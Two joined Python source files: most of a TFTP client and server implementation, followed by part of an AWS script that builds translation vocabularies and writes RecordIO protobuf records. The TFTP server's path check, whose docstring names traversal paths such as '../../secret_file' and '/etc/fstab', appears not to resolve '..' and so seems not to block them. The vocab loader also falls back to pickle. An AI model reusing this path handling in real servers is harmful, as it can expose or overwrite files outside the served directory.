UNKNOWN = 0
FILE_NOT_FOUND = 1
ACCESS_VIOLATION = 2
DISK_FULL = 3
ILLEGAL_OPERATION = 4
UNKNOWN_TRANSFER_ID = 5
FILE_EXISTS = 6
NO_SUCH_USER = 7
INVALID_OPTIONS = 8
__MESSAGES = {
UNKNOWN: '',
FILE_NOT_FOUND: 'File not found',
ACCESS_VIOLATION: 'Access violation',
DISK_FULL: 'Disk full or allocation exceeded',
ILLEGAL_OPERATION: 'Illegal TFTP operation',
UNKNOWN_TRANSFER_ID: 'Unknown transfer ID',
FILE_EXISTS: 'File already exists',
NO_SUCH_USER: 'No such user',
INVALID_OPTIONS: 'Invalid options specified',
}
@classmethod
def get_message(cls, error_code: int) -> str:
"""Return an error message for given error code.
:param error_code: error code to get the message for
:return: error message
"""
return cls.__MESSAGES[error_code]
class TFTPOptions:
# RFC 2348
BLKSIZE = b'blksize'
# RFC 7440
WINDOWSIZE = b'windowsize'
Address = NewType('Address', tuple)
Packet = NewType('Packet', Tuple[bytes, Address])
class TFTPException(Exception):
"""Generic TFTP exception."""
pass
class TFTPError(TFTPException):
"""Exception meaning that a TFTP ERROR packet received."""
def __init__(self, error_id: int, message: str) -> None:
super(TFTPError, self).__init__(
'Error {}: {}'.format(error_id, message))
self.error_id = error_id
self.message = message
class TFTPTerminatedError(TFTPException):
"""Exception meaning that the TFTP connection was terminated for the
reason passed in `error_id` and `message` arguments."""
def __init__(self, error_id: int, error_message: str,
message: str) -> None:
super(TFTPTerminatedError, self).__init__(
'Terminated with error {}: {}; cause: {}'.format(
error_id, error_message, message))
self.error_id = error_id
self.error_message = message
self.message = message
class TFTP:
"""
Base class for writing TFTP clients and servers. Handles all the basic
communication: generic method for sending and receiving packets, methods
for transmitting specific packets and whole files, as well as error
and timeout handling.
"""
def __init__(self, sock: socket.socket, addr: Address,
block_size: int = BLOCK_SIZE, window_size: int = 1) -> None:
"""
:param sock: socket to use to communicate
:param addr: address (host + port) of the connected host
"""
self._sock = sock
self._sock.settimeout(TIMEOUT)
self._addr = addr
self._block_size = block_size # RFC 2348
self._window_size = window_size # RFC 7440
# Whether to check the TID of incoming packets. If set to False, the
# next packet received will be used to set the new TID (and this will
# set _check_addr back to True)
self._check_addr = True
self.__last_packet: Packet = None
self.__packet_buffer: Packet = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._sock.close()
###########################################################################
# Error handling
###########################################################################
def _check_error(self, data: bytes, expected_opcodes: List[bytes]) -> None:
"""Check if the packet received has valid opcode and terminate the
connection if not or an ERROR packet was received.
:param data: the packet received
:param expected_opcodes: list of valid opcodes
:raise: TFTPTerminatedError if the opcode was not valid
:raise: TFTPError if an ERROR packet was received
"""
opcode = data[0:2]
if opcode == TFTPOpcodes.ERROR:
raise TFTPError(
int.from_bytes(data[2:4], byteorder='big'),
data[4:-1].decode('utf-8'))
elif opcode not in expected_opcodes:
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION,
'Invalid packet: {}'.format(data))
def _terminate(self, error_code: int, message: str,
error_message: str = None) -> None:
"""Send an ERROR packet, terminate the connection, and raise
a TFTPTerminatedError
:param error_code: error code to send
:param message: message to use for the exception
:param error_message: message to send with the ERROR packet. If None,
a default message for the given error code is used.
:raise: TFTPTerminatedError
"""
error_message = self._error_occurred(error_code, error_message)
self._sock.close()
raise TFTPTerminatedError(error_code, error_message, message)
def _error_occurred(self, error_code: int, error_message: str = None,
addr: Address = None) -> str:
"""Send an ERROR packet, auto-generating the message if necessary.
:param error_code: error code to send
:param error_message: message to send with the ERROR packet. If None,
a default message for the given error code is used.
:param addr: the address to send the packet to
:return: the error message that was sent
"""
if error_message is None:
error_message = TFTPErrorCodes.get_message(error_code)
self._send_err(error_code, error_message, addr)
return error_message
###########################################################################
# Receiving
###########################################################################
def _set_packet_buffer(self, data: bytes, addr: Address) -> None:
"""Set given packet as the "packet buffer". Packets in the buffer have
priority when trying to retrieve data using _recv(), giving a way to
use data from a different source (e.g. recvfrom() executed in another
function) when receiving a packets using a unified function.
:param data: data to be set in the buffer
:param addr: address to be set in the buffer
"""
self.__packet_buffer = Packet((data, addr))
def _recv(self, handle_timeout: bool = True) -> Packet:
"""Receive a packet, taking into account packets in the packet buffer,
and retrying (by resending the last sent packet) if needed.
:return: packet received
:raise: TFTPException on timeout
"""
if self.__packet_buffer is not None:
rv = self.__packet_buffer
self.__packet_buffer = None
return rv
if not handle_timeout:
r = self._sock.recvfrom(BUF_SIZE)
return r
retries = 0
while retries <= MAX_RETRIES:
try:
r = self._sock.recvfrom(BUF_SIZE)
return r
except socket.timeout:
retries += 1
if retries <= MAX_RETRIES:
self.__resend_last_packet()
raise TFTPException('Timed out')
def _recv_packet_mul(
self, opcodes: List[bytes],
min_data_length: int, handle_timeout: bool = True) -> Tuple[
Address, bytes, bytes]:
"""Receive a packet and check if its opcode, length, and TID are valid.
:param opcodes: list of valid opcodes
:param min_data_length: minimum valid length of the data
:param check_addr: True if TID validity should be checked; False
otherwise
:return: a 3-tuple containing: source packet address, opcode received
and the data
"""
while True:
data, addr = self._recv(handle_timeout)
if not self._check_addr or addr == self._addr:
break
logger.warning('Invalid TID: %s (expected: %s)', addr, self._addr)
self._error_occurred(TFTPErrorCodes.UNKNOWN_TRANSFER_ID, addr=addr)
if not self._check_addr:
self._addr = addr
self._check_addr = True
self._check_error(data, opcodes)
if len(data) < min_data_length + 2:
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION,
'Packet too short: {}'.format(data))
return addr, data[0:2], data[2:]
def _recv_packet(self, opcode: bytes, min_data_length: int,
handle_timeout: bool = True) -> Tuple[Address, bytes]:
"""Receive a packet and check if its opcode, length, and TID are valid.
:param opcode: valid opcode
:param min_data_length: minimum valid length of the data
:return: a pair containing: source packet address and the data received
"""
addr, _, data = self._recv_packet_mul([opcode], min_data_length,
handle_timeout)
return addr, data
def _recv_data(
self, handle_timeout: bool = True) -> Tuple[Address, bytes, bytes]:
"""Receive a DATA packet and return the block ID and the data.
:return: 3-tuple containing the source address, block ID, and the data
"""
addr, data = self._recv_packet(TFTPOpcodes.DATA, 2, handle_timeout)
return addr, data[0:2], data[2:]
def _recv_ack(self, handle_timeout: bool = True) -> Tuple[Address, int]:
"""Receive an ACK packet and return the block ID.
:return: pair containing the source address and the block ID
"""
addr, data = self._recv_packet(TFTPOpcodes.ACK, 2, handle_timeout)
return addr, int.from_bytes(data, byteorder='big')
###########################################################################
# Sending
###########################################################################
def _send(self, data: bytes, addr: Address = None) -> None:
"""Send a packet and store it as the last packet sent.
:param data: data to be sent
:param addr: the destionation address to send the packet to. If None,
self._addr is used.
"""
if addr is None:
addr = self._addr
self.__last_packet = Packet((data, addr))
self._sock.sendto(data, addr)
def __resend_last_packet(self) -> None:
"""Resend the last packet received (used for retries in _recv())."""
self._sock.sendto(*self.__last_packet)
def _send_ack(self, block_id: Union[bytes, int]) -> None:
"""Send an ACK packet.
:param block_id: block ID to send
"""
if isinstance(block_id, int):
block_id = block_id.to_bytes(2, byteorder='big')
self._send(TFTPOpcodes.ACK + block_id)
def _send_data(self, block_id: int, data: bytes) -> None:
"""Send a DATA packet.
:param block_id: block ID of the data
:param data: the data to send
"""
self._send(
TFTPOpcodes.DATA + block_id.to_bytes(2, byteorder='big') + data)
def _send_err(self, error_code: int, error_message: str = None,
addr: Address = None) -> None:
"""Send an ERROR packet.
:param error_code: error code to send
:param error_message: error message to send
:param addr: the desitination address to send the packet to
"""
error_code_bytes = error_code.to_bytes(2, byteorder='big')
error_message_bytes = error_message.encode('utf-8')
self._send(TFTPOpcodes.ERROR + error_code_bytes + error_message_bytes +
b'\x00', addr)
###########################################################################
# Options (RFC 2347)
###########################################################################
def _process_options(self, options: List[bytes]) -> Dict[bytes, bytes]:
"""Process the options received in RRQ/WRQ packet.
This is an implementation of the RFC 2347 Options Extension.
:param options: list of the option strings (null-separated in
the original packet)
:return: dictionary of the processed and accepted options
"""
if options[-1] == b'':
options.pop()
if len(options) % 2 == 1:
raise ValueError
ret_val = {}
vals = zip(options[::2], options[1::2])
d = {k.lower(): (k, v) for k, v in vals}
# Block size (RFC 2348)
if TFTPOptions.BLKSIZE in d:
orig_key, orig_val = d[TFTPOptions.BLKSIZE]
blk_size = int(orig_val)
if blk_size < 8 or blk_size > 65464:
# Invalid according to RFC 2348
raise ValueError
self._block_size = blk_size
ret_val[orig_key] = orig_val
# Window size (RFC 7440)
if TFTPOptions.WINDOWSIZE in d:
orig_key, orig_val = d[TFTPOptions.WINDOWSIZE]
window_size = int(orig_val)
if window_size < 1 or window_size > 65535:
# Invalid according to RFC 7440
raise ValueError
self._window_size = window_size
ret_val[orig_key] = orig_val
return ret_val
def _format_options(self, options: Dict[bytes, bytes]):
"""Create single options bytes object out of the provided dictionary.
:param options: dictionary to convert to bytes object
:return: generated bytes object
"""
return b''.join(b'%s\x00%s\x00' % option for option in options.items())
###########################################################################
# Files
###########################################################################
def _recv_file(self) -> bytes:
"""Receive a file by listening for DATA packets and responding
with ACKs.
:return: received file
"""
last_id = 0
parts = []
retries = 0
while retries <= MAX_RETRIES:
start_last_id = last_id
for _ in range(self._window_size):
try:
addr, block_id, data = self._recv_data(
handle_timeout=False)
id_int = int.from_bytes(block_id, byteorder='big')
if id_int == last_id + 1:
parts.append(data)
last_id = id_int
if block_id == b'\xff\xff':
last_id = -1
if len(data) < self._block_size:
self._send_ack(last_id)
return b''.join(parts)
except socket.timeout:
if last_id == start_last_id:
retries += 1
break
else:
retries = 0
if retries <= MAX_RETRIES:
self._send_ack((65535 if last_id == -1 else last_id))
raise TFTPException('Timed out')
def _send_file(self, data: bytes) -> None:
"""Send a file by sending DATA packets and listening for ACKs.
:param data: data to be sent
"""
outer_block_id = 0
block_id = 0
while True:
retries = 0
while retries <= MAX_RETRIES:
try:
if not self.__send_blocks(data, outer_block_id, block_id):
return
_, ack_block_id = self._recv_ack(handle_timeout=False)
last_block_id = block_id + self._window_size
if ((last_block_id >= ack_block_id >= block_id) or
(ack_block_id <= last_block_id % 65536 and
ack_block_id < block_id)):
# If received ACK is a reply to one of the blocks sent
# sent the next batch of blocks, else re-send
if ack_block_id < block_id:
outer_block_id += 1
block_id = ack_block_id
break
except socket.timeout:
retries += 1
else:
raise TFTPException('Timed out')
def __send_blocks(
self, data: bytes, outer_block_id: int, inner_block_id: int):
"""Send a single window of data.
:param data: data to be sent
:param outer_block_id: starting "outer" block ID (incremented by 1
each time inner block ID overflows)
:param inner_block_id: starting "inner" block ID in the range [0, 65535]
:return: False if there is no data to be sent; True otherwise
"""
blk_size = self._block_size
for i in range(self._window_size):
local_blkid = outer_block_id * 65536 + inner_block_id + i
if local_blkid * self._block_size > len(data):
if i == 0:
return False
else:
break
to_send = data[local_blkid * blk_size:
(local_blkid + 1) * blk_size]
self._send_data((local_blkid + 1) % 65536, to_send)
return True
class TFTPClient(TFTP):
"""
Class that handles communication with a TFTP server and allows to download
and upload files.
"""
def __init__(self, host: str, port: int,
block_size: int = BLOCK_SIZE, window_size: int = 1) -> None:
"""
:param host: hostname/IP of the server to connect to
:param port: UDP port of the server to connect to
:param block_size: block size, as in RFC 2347
:param window_size: window size, as in RFC 7440
"""
super(TFTPClient, self).__init__(
socket.socket(socket.AF_INET, socket.SOCK_DGRAM),
Address((host, port)), block_size, window_size)
self.__options = self._format_options(self.__create_options_dict())
def __create_options_dict(self) -> Dict[bytes, bytes]:
"""Create options dictionary to feed into TFTP._format_options method.
The method omits the options that have default value.
:return: generated dictionary
"""
d = {}
if self._block_size != BLOCK_SIZE:
d[TFTPOptions.BLKSIZE] = str(self._block_size).encode('utf-8')
if self._window_size != 1:
d[TFTPOptions.WINDOWSIZE] = str(self._window_size).encode('utf-8')
return d
def __send_rq(self, opcode: bytes, file_name: str,
mode: str = 'octet') -> None:
"""Send an RRQ/WRQ packet.
:param opcode: opcode to send (see TFTPOpcodes.RRQ and TFTPOpcodes.WRQ)
:param file_name: name of the file requested
:param mode: requested file transfer mode ('octet' by default)
"""
self._send(b'%s%s\x00%s\x00%s' % (
opcode, bytes(file_name, 'utf-8'), bytes(mode, 'utf-8'),
self.__options))
def __send_rrq(self, file_name: str, mode: str = 'octet') -> None:
"""Send an RRQ packet.
:param file_name: name of the file requested
:param mode: requested file transfer mode ('octet' by default)
"""
self.__send_rq(TFTPOpcodes.RRQ, file_name, mode)
def __send_wrq(self, file_name: str, mode: str = 'octet') -> None:
"""Send a WRQ packet.
:param file_name: name of the uploaded file
:param mode: requested file transfer mode ('octet' by default)
"""
self.__send_rq(TFTPOpcodes.WRQ, file_name, mode)
def get_file(self, file_name: str) -> bytes:
"""Retrieve a file from the connected server.
:param file_name: name of the file to download
:return: file data returned by the server
"""
self.__send_rrq(file_name)
self._check_addr = False
self.__recv_first_rrq_packet()
return self._recv_file()
def __recv_first_rrq_packet(self):
"""Receive and respond (in case of OACK) to the first packet after
sending RRQ - either OACK or DATA.
"""
addr, opcode, data = self._recv_packet_mul(
[TFTPOpcodes.OACK, TFTPOpcodes.DATA], 0)
if opcode == TFTPOpcodes.DATA:
self._set_packet_buffer(opcode + data, addr)
else:
self.__process_oack(data)
self._send_ack(b'\x00\x00')
def put_file(self, file_name: str, data: bytes) -> None:
"""Upload a file to the connected server.
:param file_name: name of the uploaded file
:param data: data to be sent
"""
self.__send_wrq(file_name)
self._check_addr = False
self.__recv_first_wrq_packet()
self._send_file(data)
def __recv_first_wrq_packet(self):
"""Receive the first packet after sending WRQ - either OACK or ACK."""
addr, opcode, data = self._recv_packet_mul(
[TFTPOpcodes.OACK, TFTPOpcodes.ACK], 0)
if opcode == TFTPOpcodes.OACK:
self.__process_oack(data)
def __process_oack(self, data: bytes):
"""Process and apply the options from the OACK packet.
:param data: raw data got from the packet
"""
self._process_options(data.split(b'\0'))
class TFTPClientHandler(TFTP):
"""
Class that handles the communication with a single TFTP client on the
server side.
"""
def __init__(self, host: str, addr: Address, root_dir: Path,
allow_upload: bool, initial_buffer: bytes = None) -> None:
"""
:param host: host of the server to bind to
:param addr: address of the client to connect with
:param root_dir: root directory of the files to serve
:param allow_upload: whether or not allow to upload files
:param initial_buffer: initial packet buffer; usually a `bytes` object
containing the first (RRQ/WRQ) packet, or None, if there is no
external server that catches the first packet.
"""
super().__init__(
socket.socket(socket.AF_INET, socket.SOCK_DGRAM), addr)
if initial_buffer is not None:
self._set_packet_buffer(initial_buffer, self._addr)
self._sock.bind((host, 0))
logger.info('Incoming connection from %s, binding at: %s',
self._addr, self._sock.getsockname())
self.__root_dir = root_dir
self.__allow_upload = allow_upload
def handle_client(self) -> None:
"""Handle the request sent by the connected client."""
opcode, file_name, mode = self.__recv_rq()
try:
path = self.__get_file_path(file_name)
if opcode == TFTPOpcodes.RRQ:
self.__handle_rrq(path)
else:
self.__handle_wrq(path)
except OSError as e:
self.__handle_file_error(e)
def __exit__(self, exc_type, exc_val, exc_tb):
logger.info('Closing connection to %s, bound at: %s',
self._addr, self._sock.getsockname())
super(TFTPClientHandler, self).__exit__(exc_type, exc_val, exc_tb)
def __recv_rq(self) -> Tuple[bytes, str, str]:
"""Receive an RRQ/WRQ packet and return received data.
:return: 3-tuple containing: received opcode, file name and file
transfer mode
"""
_, opcode, data = self._recv_packet_mul(
[TFTPOpcodes.RRQ, TFTPOpcodes.WRQ], 2)
try:
file_name_bytes, mode_bytes, *options = data.split(b'\0')
try:
new_options = self._process_options(options)
if len(new_options):
self.__send_oack(new_options)
if opcode == TFTPOpcodes.RRQ:
self._recv_ack()
except ValueError:
self._terminate(TFTPErrorCodes.INVALID_OPTIONS,
'Invalid options received')
file_name = file_name_bytes.decode('utf-8')
mode = mode_bytes.decode('utf-8')
except ValueError as e:
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION, str(e))
if mode != 'octet':
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION,
'Mode is not "octet": {}'.format(mode))
return opcode, file_name, mode
def __send_oack(self, new_options: Dict[bytes, bytes]):
"""Send an OACK packet.
:param new_options: dictionary of options to be included in
the OACK packet.
"""
msg = TFTPOpcodes.OACK + self._format_options(new_options)
self._send(msg)
def __get_file_path(self, file_name: str) -> Path:
"""Return file path inside server root directory, ignoring "evil"
paths, like "../../secret_file", "/etc/fstab", etc.
:param file_name: file name to get the path to
:return: absolute path inside the server root directory
"""
while PurePosixPath(file_name).is_absolute():
file_name = file_name[1:]
path = self.__root_dir.joinpath(file_name)
try:
path.relative_to(self.__root_dir)
except ValueError:
self._terminate(TFTPErrorCodes.ACCESS_VIOLATION,
'Invalid path: {}'.format(file_name))
return path
def __handle_rrq(self, path: Path) -> None:
"""Handle RRQ request: read and send the requested file.
:param path: path to the requested file
"""
self._send_file(path.read_bytes())
def __handle_wrq(self, path: Path) -> None:
"""Handle WRQ request: download and save the file from the client,
taking into account the `__allow_upload` setting.
:param path: path to save the file as
"""
if not self.__allow_upload:
self._terminate(TFTPErrorCodes.ACCESS_VIOLATION,
'Upload not allowed')
if path.exists():
self._terminate(TFTPErrorCodes.FILE_EXISTS,
'File exists: {}'.format(path))
self._send_ack(b'\x00\x00')
path.write_bytes(self._recv_file())
def __handle_file_error(self, e: OSError) -> None:
"""Handle given IO error, sending an appropriate ERROR packet and
terminating the transmission.
:param e: error raised when trying to open the file
"""
error_message = None
if e.errno == errno.ENOENT:
error_code = TFTPErrorCodes.FILE_NOT_FOUND
elif e.errno == errno.EPERM or e.errno == errno.EACCES:
error_code = TFTPErrorCodes.ACCESS_VIOLATION
elif e.errno == errno.EFBIG or e.errno == errno.ENOSPC:
error_code = TFTPErrorCodes.DISK_FULL
else:
error_code = TFTPErrorCodes.UNKNOWN
error_message = e.strerror
self._terminate(error_code, e.strerror, error_message)
class TFTPServer:
"""
Class that handles communication with multiple TFTP clients. Uses
TFTPClientHandler for the communication with each single client, running
one instance of this class in a separate thread for each client.
"""
def __init__(self, host: str, port: int, root_dir: Union[str, Path],
allow_upload: bool) -> None:
"""
:param host: host of the server to bind to
:param port: port to bind to
:param root_dir: the directory where the files should be served from
:param allow_upload: whether or not allow uploading new files
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (host, port)
logger.info('Starting TFTP server, listening on %s', addr)
self.sock.bind(addr)
self.host = host
self.root_dir = Path(root_dir)
self.allow_upload = allow_upload
def __enter__(self):
return self
def serve(self) -> None:
"""Run the main server loop: wait for new connections and run
TFTPClientHandler for each.
"""
while True:
data, addr = self.sock.recvfrom(BUF_SIZE)
def handle_client() -> None:
TFTPClientHandler(
self.host, addr, self.root_dir, self.allow_upload,
data).handle_client()
Thread(target=handle_client).start()
def __exit__(self, exc_type, exc_val, exc_tb):
logger.info('Stopping TFTP server')
self.sock.close()
|
create_vocab_proto.py
|
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
import argparse
import gzip
import io
import json
import logging
import multiprocessing
import os
import pickle
import struct
from collections import Counter
from contextlib import ExitStack
from itertools import chain, islice
from typing import Dict, Generator, Iterable, List, Mapping
import boto3
from record_pb2 import Record
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# Global constants
JSON_SUFFIX = ".json"
ARG_SEPARATOR = ":"
BOS_SYMBOL = "<s>"
EOS_SYMBOL = "</s>"
UNK_SYMBOL = "<unk>"
PAD_SYMBOL = "<pad>"
PAD_ID = 0
TOKEN_SEPARATOR = " "
VOCAB_SYMBOLS = [PAD_SYMBOL, UNK_SYMBOL, BOS_SYMBOL, EOS_SYMBOL]
VOCAB_ENCODING = "utf-8"
# RecordIO and Protobuf related utilities
def write_recordio(f, data):
kmagic = 0xCED7230A
length = len(data)
f.write(struct.pack("I", kmagic))
f.write(struct.pack("I", length))
upper_align = ((length + 3) >> 2) << 2
padding = bytes([0x00 for _ in range(upper_align - length)])
f.write(data)
f.write(padding)
def list_to_record_bytes(source: List[int] = None, target: List[int] = None):
record = Record()
record.features["source"].int32_tensor.values.extend(source)
record.features["target"].int32_tensor.values.extend(target)
return record.SerializeToString()
def read_next(f):
kmagic = 0xCED7230A
raw_bytes = f.read(4)
if not raw_bytes:
return
m = struct.unpack("I", raw_bytes)[0]
if m != kmagic:
raise ValueError("Incorrect encoding")
length = struct.unpack("I", f.read(4))[0]
upper_align = ((length + 3) >> 2) << 2
data = f.read(upper_align)
return data[:length]
def to_proto(f, sources, targets):
for source, target in zip(sources, targets):
record = list_to_record_bytes(source, target)
write_recordio(f, record)
def write_to_s3(fobj, bucket, key):
return boto3.Session().resource("s3").Bucket(bucket).Object(key).upload_fileobj(fobj)
def upload_to_s3(bucket, key, sources, targets):
f = io.BytesIO()
to_proto(f, sources, targets)
f.seek(0)
url = "s3n://{}/{}".format(bucket, key)
print("Writing to {}".format(url))
write_to_s3(f, bucket, key)
print("Done writing to {}".format(url))
def smart_open(filename: str, mode: str = "rt", ftype: str = "auto", errors: str = "replace"):
"""
Returns a file descriptor for filename with UTF-8 encoding.
If mode is "rt", file is opened read-only.
If ftype is "auto", uses gzip iff filename endswith .gz.
If ftype is {"gzip","gz"}, uses gzip.
Note: encoding error handling defaults to "replace"
:param filename: The filename to open.
:param mode: Reader mode.
:param ftype: File type. If 'auto' checks filename suffix for gz to try gzip.open
:param errors: Encoding error handling during reading. Defaults to 'replace'
:return: File descriptor
"""
if ftype == "gzip" or ftype == "gz" or (ftype == "auto" and filename.endswith(".gz")):
return gzip.open(filename, mode=mode, encoding="utf-8", errors=errors)
else:
return open(filename, mode=mode, encoding="utf-8", errors=errors)
def get_tokens(line: str) -> Generator[str, None, None]:
"""
Yields tokens from input string.
:param line: Input string.
:return: Iterator over tokens.
"""
for token in line.rstrip().split():
if len(token) > 0:
yield token
def add_optional_args(model_params):
model_params.add_argument(
"-vs", "--val-source", required=False, type=str, help="Validation source file."
)
model_params.add_argument(
"-vt", "--val-target", required=False, type=str, help="Validation target file."
)
model_params.add_argument(
"-to",
"--train-output",
required=False,
type=str,
default="train.rec",
help="Output filename (protobuf encoded .rec file) to write the processed train file. "
"Default: %(default)s",
)
model_params.add_argument(
"-vo",
"--val-output",
required=False,
type=str,
default="val.rec",
help="Output filename (protobuf encoded .rec file) to write the processed validation "
"file. Default: %(default)s",
)
model_params.add_argument(
"-single-vocab",
action="store_true",
default=False,
help="Include this flag to build a single vocab for both source and target.",
)
model_params.add_argument(
"--vocab-source-json",
required=False,
type=str,
default=None,
help="Path to source vocab json if it already exists",
)
model_params.add_argument(
"--vocab-target-json",
required=False,
type=str,
default=None,
help="Path to vocab target json if it already exists",
)
model_params.add_argument(
"--num-words-source",
required=False,
type=int,
default=50000,
help="Maximum vocabulary size for source. Default: %(default)s",
)
model_params.add_argument(
"--num-words-target",
required=False,
type=int,
default=50000,
help="Maximum vocabulary size for target. Default: %(default)s",
)
model_params.add_argument(
"--word-min-count-source",
required=False,
type=int,
default=1,
help="Minimum frequency of words to be included in source vocabulary. "
"Default: %(default)s",
)
model_params.add_argument(
"--word-min-count-target",
required=False,
type=int,
default=1,
help="Minimum frequency of words to be included in target vocabulary. "
"Default: %(default)s",
)
def add_vocab_args(required, optional):
required.add_argument(
"-ts", "--train-source", required=True, type=str, help="Training source file."
)
required.add_argument(
"-tt", "--train-target", required=True, type=str, help="Training target file."
)
add_optional_args(optional)
def build_from_paths(
input_source: str,
input_target: str,
single_vocab: bool = False,
num_words_source: int = 50000,
num_words_target: int = 50000,
min_count_source: int = 1,
min_count_target: int = 1,
) -> (Dict[str, int], Dict[str, int]):
"""
Creates vocabulary from paths to a file in sentence-per-line format. A sentence is just a whitespace delimited
list of tokens. Note that special symbols like the beginning of sentence (BOS) symbol will be added to the
vocabulary.
:param input_target: Input original target file path.
:param single_vocab: to build single vocabulary for source and target or not.
:param num_words_source: number of max vocabulary on source side.
:param num_words_target: number of max vocabulary on target side.
:param min_count_source: Minimum frequency to include a word in source vocabulary.
:param min_count_target: Minimum frequency to include a word in target vocabulary.
:param input_source: Input original sour file path.
:return: Word-to-id mapping.
"""
with ExitStack() as stack:
logger.info("Building vocabulary from dataset: %s and %s", input_source, input_target)
files = (stack.enter_context(smart_open(path)) for path in [input_source, input_target])
return build_vocab(
*files,
single_vocab=single_vocab,
num_words_source=num_words_source,
num_words_target=num_words_target,
min_count_source=min_count_source,
min_count_target=min_count_target
)
def read_worker(q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
int_source, int_target = deq
record = list_to_record_bytes(int_source, int_target)
q_out.put(record)
def write_worker(q_out, output_file):
with open(output_file, "wb") as f:
while True:
deq = q_out.get()
if deq is None:
break
write_recordio(f, deq)
def write_to_file(
input_source: str,
input_target: str,
output_file: str,
vocab_source: Dict[str, int],
vocab_target: Dict[str, int],
file_type: str = "train",
):
"""
Converts the input strings to integers. Processes all the input files and writes into a single file each
line if which is a list of integers.
:param input_source: input original source file path (parallel corpus).
:param input_target: input original target file path (parallel corpus).
:param output_file: Path of output file to which the processed input file will be written
:param vocab_source: String to Integer mapping of source vocabulary
:param vocab_target: String to Integer mapping of target vocabulary
"""
num_read_workers = max(multiprocessing.cpu_count() - 1, 1)
logger.info(
"Spawning %s encoding worker(s) for encoding %s datasets!", str(num_read_workers), file_type
)
q_in = [multiprocessing.Queue() for i in range(num_read_workers)]
q_out = multiprocessing.Queue()
read_process = [
multiprocessing.Process(target=read_worker, args=(q_in[i], q_out))
for i in range(num_read_workers)
]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, output_file))
write_process.start()
lines_ignored = 0
lines_processed = 0
with ExitStack() as stack:
files = (stack.enter_context(smart_open(path)) for path in [input_source, input_target])
for line_source, line_target in zip(*files):
if line_source.strip() == "" or line_target.strip() == "":
lines_ignored += 1
continue
int_source = [
vocab_source.get(token, vocab_source[UNK_SYMBOL])
for token in get_tokens(line_source)
]
int_target = [
vocab_target.get(token, vocab_target[UNK_SYMBOL])
for token in get_tokens(line_target)
]
item = (int_source, int_target)
q_in[lines_processed % len(q_in)].put(item)
lines_processed += 1
logger.info(
"""Processed %s lines for encoding to protobuf. %s lines were ignored as they didn't have
any content in either the source or the target file!""",
lines_processed,
lines_ignored,
)
logger.info("Completed writing the encoding queue!")
for q in q_in:
q.put(None)
for p in read_process:
p.join()
logger.info('Encoding finished! Writing records to "%s"', output_file)
q_out.put(None)
write_process.join()
logger.info('Processed input and saved to "%s"', output_file)
def prune_vocab(raw_vocab, num_words, min_count):
# For words with the same count, they will be ordered reverse alphabetically.
# Not an issue since we only care for consistency
pruned_vocab = sorted(((c, w) for w, c in raw_vocab.items() if c >= min_count), reverse=True)
# logger.info("Pruned vocabulary: %d types (min frequency %d)", len(pruned_vocab), min_count)
vocab = islice((w for c, w in pruned_vocab), num_words)
word_to_id = {word: idx for idx, word in enumerate(chain(VOCAB_SYMBOLS, vocab))}
logger.info(
"Final vocabulary: %d types (min frequency %d, top %d types)",
len(word_to_id),
min_count,
num_words,
)
# Important: pad symbol becomes index 0
assert word_to_id[PAD_SYMBOL] == PAD_ID
return word_to_id
def build_vocab(
data_source: Iterable[str],
data_target: Iterable[str],
single_vocab: bool = False,
num_words_source: int = 50000,
num_words_target: int = 50000,
min_count_source: int = 1,
min_count_target: int = 1,
) -> (Dict[str, int], Dict[str, int]):
"""
Creates a vocabulary mapping from words to ids. Increasing integer ids are assigned by word frequency,
using lexical sorting as a tie breaker. The only exception to this are special symbols such as the padding symbol
(PAD).
:param data_source: Sequence of source sentences containing whitespace delimited tokens.
:param data_target: Sequence of target sentences containing whitespace delimited tokens.
:param single_vocab: Whether to create a single vocab or not.
:param num_words_source: Maximum number of words in the vocabulary for source side.
:param num_words_target: Maximum number of words in the vocabulary for target side.
:param min_count_source: Minimum frequency to include a word in source vocabulary.
:param min_count_target: Minimum frequency to include a word in target vocabulary.
:return: Word-to-id mapping.
"""
vocab_symbols_set = set(VOCAB_SYMBOLS)
if single_vocab:
data = chain(data_source, data_target)
raw_vocab = Counter(
token for line in data for token in get_tokens(line) if token not in vocab_symbols_set
)
logger.info("Initial vocabulary: %d types" % len(raw_vocab))
return prune_vocab(raw_vocab, num_words_source, min_count_source), None
else:
raw_vocab_source = Counter(
token
for line in data_source
for token in get_tokens(line)
if token not in vocab_symbols_set
)
raw_vocab_target = Counter(
token
for line in data_target
for token in get_tokens(line)
if token not in vocab_symbols_set
)
return (
prune_vocab(raw_vocab_source, num_words_source, min_count_source),
prune_vocab(raw_vocab_target, num_words_target, min_count_target),
)
def vocab_to_pickle(vocab: Mapping, path: str):
"""
Saves vocabulary in pickle format.
:param vocab: Vocabulary mapping.
:param path: Output file path.
"""
with open(path, "wb") as out:
pickle.dump(vocab, out)
logger.info('Vocabulary saved to "%s"', path)
def vocab_to_json(vocab: Mapping, path: str):
"""
Saves vocabulary in human-readable json.
:param vocab: Vocabulary mapping.
:param path: Output file path.
"""
with open(path, "w") as out:
json.dump(vocab, out, indent=4, ensure_ascii=False)
logger.info('Vocabulary saved to "%s"', path)
def vocab_from_json_or_pickle(path) -> Dict:
"""
Try loading the json version of the vocab and fall back to pickle for backwards compatibility.
:param path: Path to vocab without the json suffix. If it exists the `path` + '.json' will be loaded as a JSON
object and otherwise `path` is loaded as a pickle object.
:return: The loaded vocabulary.
"""
if os.path.exists(path + JSON_SUFFIX):
return vocab_from_json(path + JSON_SUFFIX)
else:
return vocab_from_pickle(path)
def vocab_from_pickle(path: str) -> Dict:
"""
Load vocab from pickle
